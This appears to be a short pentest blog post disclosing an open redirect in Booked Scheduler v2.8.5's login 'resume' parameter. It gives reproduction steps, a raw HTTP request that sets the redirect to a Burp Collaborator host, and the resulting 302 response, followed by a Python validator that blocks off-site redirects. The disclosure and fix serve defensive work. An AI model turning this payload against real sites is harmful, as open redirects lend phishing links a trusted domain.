Saturday, 19 October 2024

Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

Description

- It was found that the application suffers from an Open Redirect on the login page via the "resume" parameter.


Open Redirect

Steps to Reproduce:

  1. Log in and intercept the HTTP request with a proxy such as Burp Suite or ZAP
  2. Set the "resume" parameter to the redirect URL, e.g. a Burp Collaborator URL
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
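A server-side check of the kind that prevents this behaviour, written here as an added example (it is not Booked Scheduler's code): the "resume" value is only honoured when it is a same-origin path under the application's own install prefix, and anything else falls back to a fixed landing page. The host and path prefix are assumptions taken from the request above; the fallback page name is constructed.

```python
"""Validate a post-login 'resume' redirect target (added example)."""
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

# Assumed deployment values, taken from the request shown above.
APP_PATH_PREFIX = "/Bookedbo8effotfu/Web/"
# Constructed fallback; a real deployment would use its own landing page.
DEFAULT_LANDING = APP_PATH_PREFIX + "dashboard.php"


def safe_resume(resume: Optional[str]) -> str:
    """Return `resume` if it is a relative path under APP_PATH_PREFIX,
    otherwise DEFAULT_LANDING. Never returns an absolute URL."""
    if not resume:
        return DEFAULT_LANDING
    # Control characters or spaces have no place in a redirect target and
    # could otherwise end up inside the Location header.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in resume):
        return DEFAULT_LANDING
    # Browsers treat '/\evil' like '//evil', so normalise before parsing.
    candidate = resume.replace("\\", "/")
    parts = urlsplit(candidate)
    # Any scheme or host means an absolute or protocol-relative URL
    # (https://collaborator-host, //evil, javascript:...), all rejected.
    if parts.scheme or parts.netloc:
        return DEFAULT_LANDING
    path = parts.path
    if not path.startswith(APP_PATH_PREFIX):
        return DEFAULT_LANDING
    # Dot segments could climb out of the prefix after normalisation.
    if any(seg in (".", "..") for seg in path.split("/")):
        return DEFAULT_LANDING
    # Rebuild without scheme/host/fragment so only path and query survive.
    return urlunsplit(("", "", path, parts.query, ""))


if __name__ == "__main__":
    # The payload from the request above versus a legitimate in-app target.
    for value in ("https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com",
                  "//evil.example/x",
                  "/Bookedbo8effotfu/Web/schedule.php?sid=1"):
        print(f"{value!r:60} -> {safe_resume(value)}")
```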
